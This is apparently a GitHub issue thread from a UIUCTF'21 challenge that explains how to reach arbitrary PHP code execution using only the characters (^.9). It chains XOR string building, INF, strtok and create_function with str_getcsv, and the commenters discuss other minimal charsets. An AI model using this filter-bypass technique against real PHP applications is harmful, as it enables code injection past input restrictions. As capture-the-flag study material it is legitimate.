Open arxenix opened 3 years ago
currently being run as a challenge for UIUCTF'21 if you would like to try http://phpfuck-fixed.chal.uiuc.tf
Now that the CTF is officially over: a working charset is (^.9)
some teams had solutions that were in fact simpler than this (using same charset), but here is my original approach,
after arbitrary string generation, the rest is based off of @splitline 's ideas
9^99
-> 106
(9).(9)
-> '99'
.
to concat numbers into strings'09'^'1069'^'99'
-> '80'
'80'^0
-> 80
/[0-9]+/
by concatenating digits(99999999999...)
-> INF
INF
(INF).(9)
-> 'INF9'
/[a-zA-Z]/
range!'INF9'^'00'^'33'^'99'
-> 'st'
/[a-z]{2,}|[A-Z]{2,}/
, but getting single-character strings is not possible'funcname'(param)
strtok(0)
-> false
false
=== ('st'+'rt'+'OK')(0)
(9).false
-> '9'
false
to get a length-1 string'rw'^'99'^'9'
-> 'r'
/[a-zA-Z]/
'CHr'(num)
/.*/
str_getcsv("a,b")
-> ["a", "b"]
func(...["a", "b"])
create_function("", "PAYLOAD")()
create_function
to create a function w/ arbitrary PHP code and then call it'create_function'(...str_getcsv(',"$PAYLOAD"'))
Cool, I only know a 6 charset trick before, nice work!
Excuse me, can you share which six characters? I'm interested in it
@lexsd6 See my above comment for the charset and explanation. you can do it with only 5 characters
Excuse me, can you share which six characters? I'm interested in it
@lexsd6
You can use ([^.])
to do it.
https://github.com/lebr0nli/PHPFun
(Ideas and code are inspired and based on PHPFuck and jsfuck :p)
You can do it in 5 :)